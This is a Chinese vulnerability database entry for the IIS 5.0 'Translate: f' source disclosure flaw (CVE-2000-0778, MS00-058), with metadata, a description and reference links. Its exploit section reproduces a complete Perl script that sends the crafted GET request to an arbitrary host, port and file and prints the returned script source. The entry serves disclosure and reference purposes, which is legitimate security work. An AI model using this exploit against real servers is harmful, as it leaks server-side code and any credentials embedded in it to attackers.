Microsoft IIS 5.0 "Translate: f"头标记导致源码泄露漏洞(MS00-058)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105960 漏洞类型 未知
发布时间 2000-08-14 更新时间 2005-10-12
CVE编号 CVE-2000-0778 CNNVD-ID CNNVD-200010-019
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20152
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-019
|漏洞详情
IIS是Microsoft公司开发的流行的HTTP服务器程序,随同Windows操作系统捆绑发布。IIS5.0在处理某些带有特殊标记的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞得到服务器上脚本的源码。如果IIS5.0接收到一个包含特殊头格式(Translate:f)的HTTP请求,同时URL末尾包含一个特殊字符("/")的话,IIS会错误得调用脚本处理引擎,可能导致文件源码泄漏给远程用户。
|漏洞EXP
source: http://www.securityfocus.com/bid/1578/info
 
Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server.
 
It is possible to force the server to send back the source of known scriptable files to the client if the HTTP GET request contains a specialized header with 'Translate: f' at the end of it, and if a trailing slash '/' is appended to the end of the URL. The scripting engine will be able to locate the requested file, however, it will not recognize it as a file that needs to be processed and will proceed to send the file source to the client.


#!/usr/bin/perl
use Socket;

####test arguments
if ($#ARGV != 2) {die "usage: DNS_name/IP file_to_get port\n";}
#####load values
$host = @ARGV[0];$port = @ARGV[2];$target = inet_aton($host);$toget= @ARGV[1];
#####build request
$xtosend=<<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend=~s/\n/\r\n/g;
####send request
#print $xtosend;
my @results=sendraw($xtosend);
print  @results;
#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;
                        print STDOUT "." if(defined $args{X});}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}
|参考资料

来源:BUGTRAQ
名称:20000815Translate:fsummary,historyandthoughts
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=080D5336D882D211B56B0060080F2CD696A7C9@beta.mia.cz
来源:MS
名称:MS00-058
链接:http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
来源:BID
名称:1578
链接:http://www.securityfocus.com/bid/1578
来源:NTBUGTRAQ
名称:20000816Translate:f
链接:http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0008&L=ntbugtraq&F=&S=&P=5212
来源:USGovernmentResource:oval:org.mitre.oval:def:927
名称:oval:org.mitre.oval:def:927
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:927
来源:NSFOCUS
名称:752
链接:http://www.nsfocus.net/vulndb/752